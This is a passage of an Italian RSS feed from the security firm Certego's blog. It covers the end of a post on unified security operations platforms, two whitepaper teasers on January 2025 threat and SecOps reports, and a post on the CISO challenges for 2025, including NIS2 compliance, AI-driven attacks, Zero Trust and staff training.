    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACiElEQVR42j2SS08TURTH+0H4Bq7xE7hxoR/AxLgwJkRCSJAYNZGFGhpUgkoEglF5+ag8Ggp0ilPa0k5hSksf05lOO51O5z2lSlwaWdy/t1Pj4peTe07u/zwDzZaOcCyBRJrDzi6DQrEC0+lAM2y0DcdHM22YdgclUURRrMD1fkI3ezHbtz0My+29LwKqZiDDZVGryUgmkmjIdbhuB7Zlw7MduLYLm9ozr4tcOY/58CKYLAvdcGFZXSpm+/wXbFN1VnaRbTg4VjuIVk2kJANx0cBuRUdM0MFQ4qKJE5pUMkXs8BuI8EsoKzxspwvT8qBbTl+wqdtYzmlYyGp4y6l4nVaxetLGCvX1hLKyiQwlXTMh6zp+/e6gap4ilAtiX1iE6imoKiJc55yOxbsItOgcjuiHHgmp/7HHIUWj1XturzUbZ24X+SqP2c1niJxsYp4J4mtmDl+4D3izPYFvqTmI9cZFQNMtFE9LKJcrECoCCoUieD7n+2qyArVtoWVYcLwfSB1xGJ+7hXsv7iK49hiToftYZRcxNj2MKyOX8Or9dH8pBykO8WQGbOIQMTaJdDaHre09MN8PcJwr/Nuih0ZTw6PZUVy/cw1DE7cxE5rCw5kHGLx6GQODA3g++7JfYVWqQ1E11JUWxFoDxbKIUllAsST4InQ2/ol4nXNsMBuY/BgEm0+g1dWxFF3D8NMxmmAEochWX5BhU9ijtxiO7IM7ysOgNydpDuS2g4ba9hPVFY22b8KiMbFVR7x0gL3TKNbYTxh6Moob4zexsv7Zb5nsMnFCBUk4EiOHGZ60LY9UVJMIlFpDJbV6k0hykzRbBqHtE1otKUoC4cU8iXFx8i60TKYWphFl2T9/AXUdmQAv4wlOAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/0f2146289e5e99af1cd8e4272fc4349a/71c1d/certego%20managed%20detection%20response%20come%20scegliere.png&quot; srcset=&quot;/website/static/0f2146289e5e99af1cd8e4272fc4349a/804b2/certego%20managed%20detection%20response%20come%20scegliere.png 384w,
/website/static/0f2146289e5e99af1cd8e4272fc4349a/e5715/certego%20managed%20detection%20response%20come%20scegliere.png 768w,
/website/static/0f2146289e5e99af1cd8e4272fc4349a/71c1d/certego%20managed%20detection%20response%20come%20scegliere.png 1536w,
/website/static/0f2146289e5e99af1cd8e4272fc4349a/a878e/certego%20managed%20detection%20response%20come%20scegliere.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h1&gt;&lt;strong&gt;3. Collaborazione migliorata&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Accesso centralizzato ai dati:&lt;/h3&gt;
&lt;p&gt;Tutte le informazioni relative agli incidenti, agli alert e alle attività investigative sono disponibili in un unico luogo. Questo consente al cliente di avere una visione chiara e completa della situazione in tempo reale.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Storico delle comunicazioni:&lt;/h3&gt;
&lt;p&gt;Grazie a un archivio integrato, le comunicazioni passate e le decisioni prese sono sempre facilmente consultabili.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;4. Miglioramento della gestione delle risorse interne&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Riduzione dei carichi operativi:&lt;/h3&gt;
&lt;p&gt;Grazie alla semplificazione delle comunicazioni, i team interni del cliente possono concentrarsi su attività strategiche, anziché dedicare tempo alla gestione manuale delle informazioni.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Flessibilità e scalabilità:&lt;/h3&gt;
&lt;p&gt;La piattaforma supporta la crescita dell’azienda, adattandosi alle esigenze in evoluzione.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;5. Esperienza utente ottimizzata&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Interfaccia intuitiva:&lt;/h3&gt;
&lt;p&gt;L’utilizzo di un unico sistema riduce la curva di apprendimento per i team del cliente, migliorando l’esperienza complessiva.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Supporto continuo:&lt;/h3&gt;
&lt;p&gt;La piattaforma consente al fornitore MDR di fornire un supporto più reattivo e proattivo, creando un rapporto di fiducia e partnership con il cliente.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br/&gt;
&lt;h1&gt;&lt;strong&gt;Un valore aggiunto per il business&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Oltre a migliorare le comunicazioni, una piattaforma unificata consente ai clienti di &lt;strong&gt;ottenere maggiore controllo sulle operazioni di sicurezza&lt;/strong&gt;, migliorando l’allineamento strategico con il proprio fornitore MDR.
Questo si traduce in una &lt;strong&gt;gestione più efficace dei rischi&lt;/strong&gt;, una &lt;strong&gt;riduzione dei costi operativi&lt;/strong&gt; e una &lt;strong&gt;maggiore resilienza dell’organizzazione&lt;/strong&gt;. In un mondo dove la rapidità e l’efficacia della risposta agli incidenti fanno la differenza, l’&lt;strong&gt;adozione di una piattaforma unificata di Security Operations rappresenta non solo una scelta strategica, ma un vantaggio competitivo&lt;/strong&gt;. Una piattaforma unificata per la gestione della cybersecurity non è solo uno strumento tecnico, ma un &lt;strong&gt;abilitatore di collaborazione e trasparenza&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Investire in una soluzione di questo tipo significa creare le basi per un approccio più efficace e coordinato alla sicurezza, che beneficia sia il cliente che il fornitore.&lt;/p&gt;
&lt;p&gt;In Certego, crediamo fermamente che la chiave per una cybersecurity di successo risieda in una comunicazione fluida e in una gestione centralizzata delle operazioni.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Gennaio 2025]]></description><link>https://www.certego.net/blog/whitepaper-gennaio-2025-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-gennaio-2025-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Wed, 12 Feb 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di gennaio 2025, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Security Operations Report - Gennaio 2025]]></title><description><![CDATA[Il report realizzato dal team di SecOps di Certego che analizza i trend di sicurezza delle aziende italiane]]></description><link>https://www.certego.net/blog/whitepaper-secops-report-gennaio-2025/</link><guid isPermaLink="false">whitepaper-secops-report-gennaio-2025</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 02 Feb 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Avere una chiara consapevolezza dei rischi a cui le aziende sono maggiormente esposte è essenziale per comprendere i trend degli attacchi informatici.&lt;/p&gt;
&lt;p&gt;Il report realizzato dal team di Security Operations di Certego, basato su un campione di 1.200.000 asset IT di aziende italiane di diverse dimensioni e settori, offre una panoramica preziosa delle minacce attuali.&lt;/p&gt;
&lt;p&gt;Grazie alla piattaforma PanOptikon®, che integra avanzate funzioni di data analytics, abbiamo potuto identificare le principali tendenze, vulnerabilità e minacce nel panorama della cybersecurity italiana aggiornate a gennaio 2025.&lt;/p&gt;
&lt;p&gt;L’approccio metodologico ha permesso di ottenere una visione dettagliata e costantemente aggiornata dei rischi informatici che le aziende italiane affrontano, offrendo uno strumento fondamentale per comprendere le criticità e migliorare la sicurezza aziendale.&lt;/p&gt;
&lt;p&gt;Il report risponde a domande cruciali, come:&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi?
Quali settori risultano maggiormente vulnerabili?
Qual è la proporzione tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Compila il modulo per ricevere il PDF completo.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[CISO 2025]]></title><description><![CDATA[Innovare per fronteggiare le nuove minacce alla cybersecurity]]></description><link>https://www.certego.net/blog/ciso-2025-innovare-per-fronteggiare-le-nuove-minacce-alla-cybersecurity/</link><guid isPermaLink="false">ciso-2025-innovare-per-fronteggiare-le-nuove-minacce-alla-cybersecurity</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Sun, 26 Jan 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;La cybersecurity è ormai fondamentale per la resilienza organizzativa. In un contesto di rapide innovazioni tecnologiche e crescenti minacce geopolitiche, le strategie proattive sono essenziali per affrontare minacce sofisticate e tutelare fiducia e reputazione. Anche settori tradizionalmente meno a rischio sono ora vulnerabili, richiedendo decisioni strategiche e un approccio adattivo per garantire una protezione efficace.
Guardando al futuro, è cruciale considerare le sfide principali che i CISO affronteranno nel 2025, guidate da un panorama di minacce in continua evoluzione.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;1. Garantire conformità alla direttiva NIS2&lt;/h2&gt;
&lt;p&gt;La direttiva NIS2 estende il proprio ambito, includendo un numero maggiore di aziende chiamate a conformarsi a requisiti rigorosi per rafforzare la sicurezza delle infrastrutture critiche e garantire la resilienza operativa. Per allinearsi a queste normative, le organizzazioni devono affrontare molteplici sfide, tra cui la mappatura delle vulnerabilità, la gestione dei rischi e l’implementazione di processi di Incident Response in grado di rispettare le tempistiche e modalità di comunicazione degli incidenti alle autorità competenti&lt;/p&gt;
&lt;p&gt;È cruciale che &lt;strong&gt;il processo di adeguamento non sia delegato esclusivamente al CISO o al dipartimento IT, ma venga affrontato come uno sforzo condiviso tra le funzioni aziendali&lt;/strong&gt;. Il CISO assume il ruolo di coordinatore, assicurando che ogni settore contribuisca al raggiungimento degli obiettivi di conformità.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Per le attività più critiche, come la gestione dell’Incident Response, il supporto di provider di cybersecurity specializzati può garantire una risposta rapida e conforme alle tempistiche di notifica previste dalla normativa&lt;/strong&gt;.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;2. Colmare il gap con i cybercriminali&lt;/h2&gt;
&lt;p&gt;Per rispondere all&apos;evoluzione delle minacce, come il Ransomware-as-a-Service e l&apos;uso avanzato dell&apos;intelligenza artificiale da parte degli aggressori, &lt;strong&gt;le aziende devono adottare strategie di difesa che combinino approcci olistici e proattivi&lt;/strong&gt;. L’approccio olistico combina persone, processi e tecnologie, creando una difesa multilivello. Valutazioni periodiche delle vulnerabilità, simulazioni pratiche e aggiornamenti dei piani di risposta sono fondamentali per rafforzare la resilienza aziendale e allineare le strategie di sicurezza agli obiettivi operativi.&lt;/p&gt;
&lt;p&gt;Parallelamente, un approccio proattivo è indispensabile per rimanere un passo avanti rispetto agli attacchi. &lt;strong&gt;Grazie all’uso della threat intelligence e all’analisi dei comportamenti degli avversari, le aziende possono anticipare le tecniche di attacco emergenti e adattare i sistemi di difesa in modo tempestivo&lt;/strong&gt;. Questo permette di prevenire efficacemente le minacce e di migliorare significativamente la sicurezza complessiva.&lt;/p&gt;
&lt;h2&gt;3. Difendersi dagli attacchi potenziati dall’Intelligenza Artificiale&lt;/h2&gt;
&lt;p&gt;L’adozione dell’&lt;strong&gt;intelligenza artificiale (AI)&lt;/strong&gt; da parte dei cybercriminali sta trasformando profondamente il panorama delle minacce, con attacchi sempre più mirati, adattivi e difficili da individuare. Entro il 2025, Gartner prevede che almeno il 30% degli attacchi sarà potenziato dall’AI, utilizzando tecniche come phishing automatizzato, malware che evolve dinamicamente e rilevamento in tempo reale delle vulnerabilità nei sistemi aziendali.&lt;/p&gt;
&lt;p&gt;Per contrastare questi rischi, le aziende devono implementare tecnologie in grado di analizzare un numero sempre maggiore di dati di cybersecurity in tempo reale per identificare le anomalie con precisione. &lt;strong&gt;Strumenti basati sulla visibilità dei dati grezzi di cybersecurity e correlazione degli eventi permettono di monitorare ogni angolo dell’infrastruttura, migliorando il rilevamento e la gestione degli incidenti, con una significativa riduzione dei falsi positivi&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/riduzione-dei-falsi-positivi-strategia-certego-mdr-efficace/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACqklEQVR42j1SS0wTURTtzr0xRtQFEhWoTWwCAUFq+AkRCYQEE2uMCwJ+QqKujVtFFyDExIBSSUiIGo2YCrQF29IPg6FFaWk7nX6m05npv/hZ2sU7vinRxcl79717z/0dVTQuYNFig83hhnHZBO93H8RUFnxSRkJM7YPeJTmDbX8QXop8/ieSUrrsI9B/BYpN/UqqGJ+Ey7UBNsTCbrMjFGSRSWchSTJSMnWkzrwgIZfbw4cVMzqGrmH2/TwNlpDNFsvJFPwn5GnAGpeFNZwGE8/DwaXhZCUwnAxTQIIvTqtQgnNFLJrNUPd0oPXGOdx9fBtGqwtyKo9UpvCPuKSKCjJmPSKmt0TMeUW8pOdrr4T5bQlvdySEBKVKmRLuwbhmQm2nDq36Zgzev4D24RE8GL8HxrOJYvE3RDlDK6TMDCvA4uOxEeThDiaw6k/AGUhgk9oxXkCUjiVD2/tkWYbuSh0GR7W4PNKIi7dGodM3ov9mPR6OPcJukKOEdD5bW14wGwxsdgdsVjuc605suBmsO1wwrVphd9IZc3HYXE7U96jRNFCD6hYNmq8Po/dON3qHalGhrcCUYaakUnoPhDj4gxx8AVbJgl1qB9gIfQvTvwh26GZ3Q2FEYgLa+tuhaa9E84AG2j49dFfPo+HSSVQ1VWBiZqqkUlaeze+VkSv8QDpbKG9MTmXKUpGohBQkpRQKxV8wLMzh0KnDOHamEuquPpztakCnvgbqtiOYmp3cb3ll1Y4lkxUfjWa4GQ8ESuSPSwjyMrhoAmwkXoYisTTd6JPxcVRpzuB4XQtONJ6GtvsoDlYfwNizp2UdkiXTF7JssZHFzxbicH0lCSlDfDGR+ClCXIyEwlESZKMkGk+ShCgTWinxfPMRw8I78vzVDDG8mSYTLyZhdTj+/AXCGW3Ek4Sy7AAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/be60b450087c54af42059818f4fe71dd/71c1d/riduzione%20falsi%20positivi%20certego.png&quot; srcset=&quot;/website/static/be60b450087c54af42059818f4fe71dd/804b2/riduzione%20falsi%20positivi%20certego.png 384w,
/website/static/be60b450087c54af42059818f4fe71dd/e5715/riduzione%20falsi%20positivi%20certego.png 768w,
/website/static/be60b450087c54af42059818f4fe71dd/71c1d/riduzione%20falsi%20positivi%20certego.png 1536w,
/website/static/be60b450087c54af42059818f4fe71dd/a878e/riduzione%20falsi%20positivi%20certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;4. Automatizzare le attività ripetitive nei Security Operations Center (SOC)&lt;/h2&gt;
&lt;p&gt;Per gestire la crescente complessità delle minacce informatiche, è cruciale implementare soluzioni in grado di automatizzare le attività ripetitive nei Security Operations Center (SOC). Operazioni come la correlazione degli eventi, il triage delle minacce e la gestione dei falsi positivi possono essere automatizzate per migliorare l’efficienza e ridurre il carico di lavoro sul personale.&lt;/p&gt;
&lt;p&gt;Queste automazioni consentono di velocizzare le operazioni quotidiane, riducendo i tempi di reazione e minimizzando il rischio di errori umani. Con processi più snelli e standardizzati, &lt;strong&gt;i team di sicurezza possono dedicarsi a minacce più complesse e strategiche, aumentando così la capacità dell’organizzazione di rispondere efficacemente agli attacchi&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;5. Dimostrare il valore della sicurezza al board e agli stakeholder&lt;/h2&gt;
&lt;p&gt;La capacità di collegare la sicurezza agli obiettivi aziendali è fondamentale per ottenere il supporto del board e degli stakeholder. Fornire dati chiari sui benefici tangibili delle iniziative di cybersecurity, come la riduzione del rischio e il miglioramento dell’efficienza operativa, aiuta a dimostrare il valore strategico degli investimenti in sicurezza.&lt;/p&gt;
&lt;p&gt;Metodi di qualificazione del rischio, supportati da piattaforme tecnologiche in grado di esportare report di cybersecurity, consentono di &lt;strong&gt;tradurre le priorità tecniche in termini comprensibili per il consiglio di amministrazione&lt;/strong&gt;. Questi strumenti aiutano a evidenziare il valore degli investimenti in ambito cyber, &lt;strong&gt;favorendo decisioni più consapevoli e un’integrazione strategica della sicurezza nell&apos;azienda, con un focus sulle aree più critiche per rafforzare la resilienza complessiva&lt;/strong&gt;&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/unified-security-operations-platform-la-chiave-per-una-sicurezza-centralizzata-e-proattiva/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACn0lEQVR42j1TS2sTURTO1q0rQcGFIoguVKSL4kbcaEEQhK5ciSCoINX/INgq1kWtrbXQVtIHtKGtSU0aE5tXM5NJhjSPmTbJZJ7JJG2aUivVLO7nSSIuDt+95957znfOd66jUFLh8gYQ2Ihgxb0GQUxDt2womomyZhFahCYMq4aEKIJLptBoHEIzKuQ3oOpWx7p7s+UoKhpC4SjyeQnBQBC5nAS7YsM0KIhhEVqdh3b9ALMrs7h44zwGRwYpEfnsJsp6N+H/gG0HV6rBJ1nwyTXEdgizOkKSgahsYD2nI6/oaNQaCMQ9uHL3LE5eOoH+gZvwhF2dQLppE0vzH0PVxCSvYjKhYyqhYUrQMJ3UMS/qGON0TJB/LqWCV/Yw411F773LOHP1FPqeXoOfX4aQ5SFsJWHXDtrBuwxDkon1rIaY3GUWkXRw28RQUvF9S0EgoyCUt7AU9uL2wx5coLJfvHqGn4fHqNgVDE8PYd7tRFaWW45SWYeQSILnEohvch0UEikkkyLC1Nt1nx/B4A8IPAkiRvD89QMsLS9DVTXsN5skloXPCxO487gHo7PviCE1lBNEROMCYmTRzQRiXJLUzoBPpjvr9rlSNiEVZTjdk/h12MLv4xYxPEI6l8HQ+BB6+s9hZGa45WhLXt/dR32vid1Gk9RsUFZS2arCaqtdqcGq1qg/pLhVp36JGFscBJ+N0D0TzcYRFrxTuN5/GsOf3rccimrA4wti1eOnUr4hHOOhGlVkSgZyigm5oEDaLkHeKaE9YiYl+bjwFvcHbuHlm0dwupz48GUUfU96MT432plD9nXNz9zeAHOtetlGOM7KRpWlizrbKhosv11iebnAclKB0Sdgqmaxmn3AaMDZotfJfBt+FgxxzEUTEEtF/vwF9yWU9kK+ex4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/cabd8bc5d181d20d9156f9608b05ff5a/71c1d/Unified%20SecOps%20Platform%20certego.png&quot; srcset=&quot;/website/static/cabd8bc5d181d20d9156f9608b05ff5a/804b2/Unified%20SecOps%20Platform%20certego.png 384w,
/website/static/cabd8bc5d181d20d9156f9608b05ff5a/e5715/Unified%20SecOps%20Platform%20certego.png 768w,
/website/static/cabd8bc5d181d20d9156f9608b05ff5a/71c1d/Unified%20SecOps%20Platform%20certego.png 1536w,
/website/static/cabd8bc5d181d20d9156f9608b05ff5a/a878e/Unified%20SecOps%20Platform%20certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;6. Prevedere piani efficaci di Incident Response&lt;/h2&gt;
&lt;p&gt;L’aumento degli attacchi informatici rende indispensabile dotarsi di piani di Incident Response ben strutturati per minimizzare l’impatto delle minacce. Tecniche di attacco sempre più sofisticate, come gli attacchi DDoS, che sfruttano botnet e strategie multi-vettore per eludere le difese tradizionali e compromettere la stabilità delle infrastrutture, richiedono protocolli chiari e costantemente aggiornati. &lt;strong&gt;Testare regolarmente i piani di Incident Response attraverso esercitazioni pratiche&lt;/strong&gt; garantisce una risposta rapida e coordinata, riducendo al minimo i tempi di inattività.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Allenarsi alla gestione degli incidenti e pianificare procedure di tactical response consente di proteggere le operazioni aziendali, bilanciando la crescente pressione sulle funzioni di sicurezza con l’esigenza di mantenere la continuità operativa&lt;/strong&gt;. Un approccio ben pianificato e collaudato permette alle aziende di reagire efficacemente anche nei momenti più critici.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;7. Adottare un approccio Zero Trust&lt;/h2&gt;
&lt;p&gt;Il furto di credenziali e le minacce interne rappresentano rischi crescenti, specialmente con l’espansione del lavoro ibrido. Adottare un modello di sicurezza Zero Trust, che presuppone che &lt;strong&gt;nessun utente o dispositivo, sia interno che esterno alla rete, sia automaticamente considerato affidabile, è una strategia essenziale per mitigare questi rischi&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Questo approccio non solo rafforza la sicurezza delle infrastrutture aziendali, ma riduce anche significativamente il rischio di abusi da parte di attori interni ed esterni, garantendo una protezione più solida e completa.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;8.	Continuare a formare e sensibilizzare il personale&lt;/h2&gt;
&lt;p&gt;Investire nella formazione continua è essenziale per ridurre il rischio di errori umani e aumentare la consapevolezza sulle pratiche di sicurezza informatica. Programmi di sensibilizzazione mirati aiutano i dipendenti a riconoscere minacce comuni, come phishing e malware, migliorando la capacità dell’organizzazione di prevenire gli attacchi.&lt;/p&gt;
&lt;p&gt;Una forza lavoro ben informata rappresenta una delle prime linee di difesa più efficaci e contribuisce significativamente al rafforzamento della postura di sicurezza aziendale.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity&lt;/h2&gt;
&lt;p&gt;I servizi di Managed Detection &amp;#x26; Response di Certego si basano sulla piattaforma proprietaria &lt;strong&gt;PanOptikon®&lt;/strong&gt;, progettata per abilitare il monitoraggio in tempo reale, l&apos;analisi e la risposta agli incidenti, facilitando anche l&apos;interazione diretta tra il team IT del cliente e il Detection &amp;#x26; Response team di Certego. Grazie al suo approccio modulare, la piattaforma si adatta facilmente all&apos;infrastruttura organizzativa e può scalare per rispondere a nuove esigenze.&lt;/p&gt;
&lt;p&gt;Affiancano la piattaforma un team specializzato di &lt;strong&gt;Security Operations&lt;/strong&gt; e un&apos;intensa attività di ricerca nella &lt;strong&gt;Cyber Threat Intelligence&lt;/strong&gt;, che garantiscono un supporto completo e innovativo nei servizi di Managed Detection &amp;#x26; Response.&lt;/p&gt;
&lt;p&gt;Questa combinazione tra tecnologia avanzata, competenze specialistiche e analisi approfondita delle minacce consente a Certego, da oltre 12 anni, di essere un leader innovativo nei servizi di Managed Detection &amp;#x26; Response.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-come-scegliere-il-servizio-migliore-per-la-tua-azienda/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACcklEQVR42lWST1PTUBTFs/Rb6MKdfgp164aVS1k5gqLjwIg7u3JGVBaO49Jxo8hoAVuVWostraWhYKmlTZrSUNqXl79tCQQdouR40+mGxW9y33u575177xEM0/K7vb7f6+/7Trfnm5Z9Gts5tdYN0+8wzee64Ye5Q45p/4S+fYEClLbKEIsbqMl1MKZB3W1hp7mLxk5zwE5IU4XGDRimDZ3r0HV9EIcw3Qwsuwt60BNarTYikYe4MzGB9/PzcPtdeO4+/v75PUw04B8f41MshvRqFiuqg+g2wwIRq2pINUykGzxYV3WYpukJhmGgKKtIliTE8puYS4sQ6bBkemCOi37fhf/vBIsLUSSSKRRaDpYqe0hIGlYUjnqbQ221gw6p1zj3BOoF6lTOL0lBRVZQ2pawUa5g9H4E049nMTp6HZcuX8Gt2xMQCyIymQxiS4uIk+LP8TjSmVWsFQqBpnG0O+xI0Kgsz/NwRLiui8ODg0E8++IlxqamcPfeJM6dPY9rIyMoFotYTX1DavkL0sllRN/NQa6UoRtGEAqjoXgCo5u3tmVUpQY63AIn6TJzcPVtEReexXHxyUecGXuOkckI1tfymNk0MZXjmM7reJDneCQytJkWhL3mBvUwVJjN5ZFIJPE9k0WWGh9LZXBj/gdufihgPCpiPF7GzJslunANr6o2nq4zzIZsaHhNa5pwQLZDh1EPQ9s0VRWSLKMm1UhpDbIsQWvUwJQqWJ2QK9htKNhrM3hdC55j4tA24BEK/SvJSiDXldBuNGXTohcc2E5vSHeAOUS3Bj6DFkLV7JFPNRLBKS88+5rOkZ1ywXIigZ+lkvcfsqyuVm1x1+IAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/01a2d2c15569ede70958143f209e6dae/71c1d/certego%20scegliere%20mdr%20migliore.png&quot; srcset=&quot;/website/static/01a2d2c15569ede70958143f209e6dae/804b2/certego%20scegliere%20mdr%20migliore.png 384w,
/website/static/01a2d2c15569ede70958143f209e6dae/e5715/certego%20scegliere%20mdr%20migliore.png 768w,
/website/static/01a2d2c15569ede70958143f209e6dae/71c1d/certego%20scegliere%20mdr%20migliore.png 1536w,
/website/static/01a2d2c15569ede70958143f209e6dae/a878e/certego%20scegliere%20mdr%20migliore.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
